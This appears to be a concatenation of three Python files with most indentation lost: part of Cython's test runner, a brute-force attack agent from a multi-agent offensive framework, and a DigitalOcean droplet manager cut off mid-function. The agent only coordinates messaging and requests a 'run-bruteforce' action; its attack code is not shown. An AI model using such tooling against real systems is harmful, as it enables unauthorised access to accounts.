libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = 'cython.py'
if sys.version_info[0] >=3 and CY3_DIR:
cython = os.path.join(CY3_DIR, cython)
cython = os.path.abspath(os.path.join('..', '..', cython))
try:
subprocess.check_output([
"make",
"PYTHON='%s'" % sys.executable,
"CYTHON='%s'" % cython,
"LIBDIR1='%s'" % libdir,
"paths", "test",
])
except subprocess.CalledProcessError as err:
print(err.output.decode())
raise
self.assertTrue(True) # :)
def load_listfile(filename):
    # just re-use the FileListExcluder implementation
fle = FileListExcluder(filename)
return list(fle.excludes)
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, mod in deps.items():
try:
__import__(mod)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
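        # The list file contains one test name per line; blank lines and lines
        # starting with '#' are ignored, and anything after the first whitespace
        # on a line is treated as a trailing comment.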
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = any(string_selector(ex)(testname) for ex in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
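    # "tag:value" strings become TagsSelectors (e.g. the --ticket option below
    # passes "ticket:<number>"); anything else is treated as a case-insensitive
    # regular expression matched against the test name.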
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
    # deterministic partition of the tests, which is important.
# Random seed to improve the hash distribution.
_seed = base64.b64decode(b'2ged1EtsGz/GkisJr22UcLeP6n9XIaA5Vby2wM49Wvg=')
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
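        # A test is *excluded* when its hash does not map to this shard, so running
        # all shards 0..shard_count-1 together still covers every test exactly once.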
hashval = _hash(self._seed + testname) & 0x7fffffff if _is_py2 else _hash(self._seed + testname.encode())
return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
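    # Join any threads left behind by a test (other than the current thread and
    # the 'time_stamper' keep-alive thread); warn about the survivors and raise
    # PendingThreadsError so the test run can flag them.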
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("--listfile", dest="listfile",
action="append",
help="specify a file containing a list of tests to run")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
# requires glob with the wildcard.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.listfile:
for listfile in options.listfile:
cmd_args.extend(load_listfile(listfile))
if options.capture:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
if "PYTHONIOENCODING" not in os.environ:
# Make sure subprocesses can print() Unicode text.
os.environ["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
errors = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
errors.append(shard_num)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if errors:
sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
os.close(stderr)
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
# faulthandler should be able to provide a limited traceback
# in the event of a segmentation fault. Hopefully better than Travis
# just keeping running until timeout. Only available on Python 3.3+
try:
import faulthandler
except ImportError:
pass # OK - not essential
else:
faulthandler.enable()
if sys.platform == "win32" and sys.version_info < (3, 6):
# enable Unicode console output, if possible
try:
import win_unicode_console
except ImportError:
pass
else:
win_unicode_console.enable()
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CFLAGS.append("-DCYTHON_REFNANNY=1")
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
CFLAGS.append('-Wno-unused-function')
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depends on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('pypy2_bugs.txt', IS_PYPY and IS_PY2),
('pypy_crash_bugs.txt', IS_PYPY),
('pypy_implementation_detail_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
if options.exit_ok:
return options.shard_num, stats, 0
else:
return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
agentBruteForce.py
|
#!/usr/bin/env python3
'''
Brute Force Attack Agent
'''
import sys,os
import validators
import re, random
from furl import *
from urllib.parse import urlparse
import time, signal
from multiprocessing import Process
import threading
import stomp
from daemonize import Daemonize
from os.path import basename
current_dir = os.path.basename(os.getcwd())
if current_dir == "agents":
sys.path.append('../')
if current_dir == "Kurgan-Framework":
sys.path.append('./')
from libs.STOMP import STOMP_Connector
from libs.FIPA import FIPAMessage
from libs.Transport import Transport
import libs.Utils as utl
import config as cf
from actions.bruteforceAction import BruteForceAction
AGENT_NAME="AgentBruteForce"
AGENT_ID="6"
def agent_status():
mAgent = Transport()
mAction = BruteForceAction()
mAction.set_mAgent(mAgent)
ret = mAction.requestInfo('request','All','agent-status','*')
mAction.receive_pkg(mAgent)
def get_infra():
mAgent = Transport()
mAction = BruteForceAction()
mAction.set_mAgent(mAgent)
toAgent = "AgentWebInfra"
ret = mAction.requestInfo('request',toAgent,'agent-status','*')
mAction.receive_pkg(mAgent)
def get_url_base():
mAgent = Transport()
mAction = BruteForceAction()
toAgent = "MasterAgent"
mAction.set_mAgent(mAgent)
ret = mAction.requestInfo('request',toAgent,'base-url-target','*')
mAction.receive_pkg(mAgent)
def run_bruteforce():
mAgent = Transport()
mAction = BruteForceAction()
toAgent = "MasterAgent"
mAction.set_mAgent(mAgent)
ret = mAction.requestInfo('request',toAgent,'run-bruteforce','*')
mAction.receive_pkg(mAgent)
def agent_quit():
mAction = BruteForceAction()
mAgent = Transport()
mAction.set_mAgent(mAgent)
mAction.deregister()
sys.exit(0)
def handler(signum, frame):
print("Exiting of execution...", signum);
agent_quit()
def runAgent():
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
print("Loading " + AGENT_NAME + " ...\n")
mAgent = Transport()
mAction = BruteForceAction()
mAction.set_mAgent(mAgent)
mAction.registerAgent()
fm = FIPAMessage()
agent_id=[]
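    # Wait for FIPA packages from other agents and collect every new agent id
    # announced via "agent-name", skipping ids that were already recorded.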
while True:
time.sleep(1)
rcv = mAgent.receive_data_from_agents()
if not len(rcv) == 0:
fm.parse_pkg(rcv)
match = re.search("(agent-name(.)+)(\(\w+\))", rcv)
if match:
field = match.group(3).lstrip()
match2 = re.search("\w+",field)
if match2:
agt_id = match2.group(0)
if agt_id in agent_id:
continue
else:
print("agentID: ", agt_id)
agent_id.append(agt_id)
print(rcv)
mAction.add_available_agent(agt_id)
break
else:
print(rcv)
print("Available Agents: ", mAction.get_available_agents())
mAgent = Transport()
mAction = BruteForceAction()
mAction.set_mAgent(mAgent)
mAction.cfp("run-bruteforce", "*")
msg_id=[]
while True:
time.sleep(1)
rcv = mAgent.receive_data_from_agents()
if not len(rcv) == 0:
fm.parse_pkg(rcv)
match = re.search("message-id:(.\w+\-\w+)", rcv)
if match:
message_id = match.group(1).lstrip()
if message_id in msg_id:
continue
else:
msg_id.append(message_id)
#print(rcv)
mAgent.zera_buff()
break
else:
continue
#print(rcv)
    p = Process(target=get_url_base)
p.start()
p.join(3)
def show_help():
print("Kurgan MultiAgent Framework version ", cf.VERSION)
print("Usage: python3 " + __file__ + " <background|foreground>")
print("\nExample:\n")
print("python3 " + __file__ + " background")
exit(0)
def run(background=False):
    if background:
pid = os.fork()
if pid:
p = basename(sys.argv[0])
myname, file_extension = os.path.splitext(p)
pidfile = '/tmp/%s.pid' % myname
daemon = Daemonize(app=myname, pid=pidfile, action=runAgent)
daemon.start()
print("Agent Loaded.")
else:
runAgent()
def main(args):
    if args[0] == "foreground":
        run(background=False)
    elif args[0] == "background":
        run(background=True)
    else:
        show_help()
if __name__ == '__main__':
if len(sys.argv) == 1:
show_help()
else:
main(sys.argv[1:])
|
droplet.py
|
from __future__ import annotations
from dataclasses import dataclass, field
from ..digitaloceanapi.droplets import Droplets
from ..digitaloceanapi.volumes import Volumes
from .action import *
from .snapshot import *
from .size import *
from .volume import *
from .account import *
from ..common.cloudapiexceptions import *
import json
import threading
import time
import re
@dataclass
class DropletSnapshotAttributes:
id: int = None
name: str = None
distribution: str = None
slug: str = None
public: bool = None
regions: list = field(default_factory=list)
created_at: str = None
min_disk_size: int = None
type: str = None
size_gigabytes: float = None
class DropletSnapshot:
def __init__(self):
self.attributes = DropletSnapshotAttributes()
class DropletManager:
def __init__(self):
self.dropletapi = Droplets()
self.smanager = SnapshotManager()
self.amanager = ActionManager()
self.account_manager=AccountManager()
    def check_limit(self):
        droplet_limit = self.account_manager.droplet_limit()
        if len(self.retrieve_all_droplets()) >= droplet_limit:
            raise ErrorAccountDropletLimitReached(
                f"You have reached your droplet limit of {droplet_limit}"
            )
def is_valid_droplet_name(self,droplet_name):
#Double check hostname for valid chars
re_is_valid_hostname=re.compile('^[a-zA-Z0-9.-]+$').search
if not bool(re_is_valid_hostname(droplet_name)):
raise ErrorDropletNameContainsInvalidChars(f"\"{droplet_name}\" is not a valid hostname, droplet names must contain only (a-z, A-Z, 0-9, . and -)")
def create_new_droplet(
self,
name,
region,
size,
image,
ssh_keys=[],
backups=None,
ipv6=None,
private_networking=None,
vpc_uuid=None,
user_data=None,
monitoring=None,
volumes=[],
tags=[],
):
arguments = locals()
del arguments["self"]
self.is_valid_droplet_name(arguments['name'])
self.check_limit()
newdroplet = Droplet()
newdroplet.arguments = DropletArguments(**arguments)
response = self.dropletapi.create_new_droplet(**arguments)
if response:
#
droplet_data = dict(json.loads(response.content.decode("utf-8"))["droplet"])
newdroplet.attributes = DropletAttributes(**droplet_data)
else:
raise Exception(f"Could not create droplet {name}, {response.content}")
return newdroplet
def retrieve_droplet_by_id(self, id):
"""
Returns a Droplet object containing attributes for a droplet with id.
        Args:
            id: The id of the droplet to retrieve.
        Returns:
            Droplet: A droplet object containing the attributes of the droplet with that id.
"""
if not self.does_droplet_id_exist(id):
raise ErrorDropletNotFound(f"Droplet with id:{id} does not exists")
newdroplet = Droplet(status="retrieve")
response = self.dropletapi.retrieve_droplet_by_id(id)
if response:
content = json.loads(response.content.decode("utf-8"))
droplet_data = dict(content["droplet"])
newdroplet.attributes = DropletAttributes(**droplet_data)
return newdroplet
def retrieve_droplets_by_name(self, name):
return_droplets = []
droplets = self.retrieve_all_droplets()
for droplet in droplets:
if droplet.attributes.name == name:
return_droplets.append(droplet)
return return_droplets
def retrieve_all_droplets(self):
"""
        Returns a list of Droplet objects, one for each droplet in the DigitalOcean account.
        Returns:
            list[Droplet]: One Droplet object per droplet in the account.
"""
# Build list of droplets from api, but take in to account possible pagination.
droplet_list = []
page, per_page = 1, 10
response = self.dropletapi.list_all_droplets(page=page, per_page=per_page)
content = json.loads(response.content.decode("utf-8"))
droplet_list.extend(content["droplets"])
try:
while content["links"]["pages"]["next"]:
page = page + 1
response = self.dropletapi.list_all_droplets(
page=page, per_page=per_page
)
content = json.loads(response.content.decode("utf-8"))
droplet_list.extend(content["droplets"])
except KeyError:
pass
# Build and return that Droplet object array.
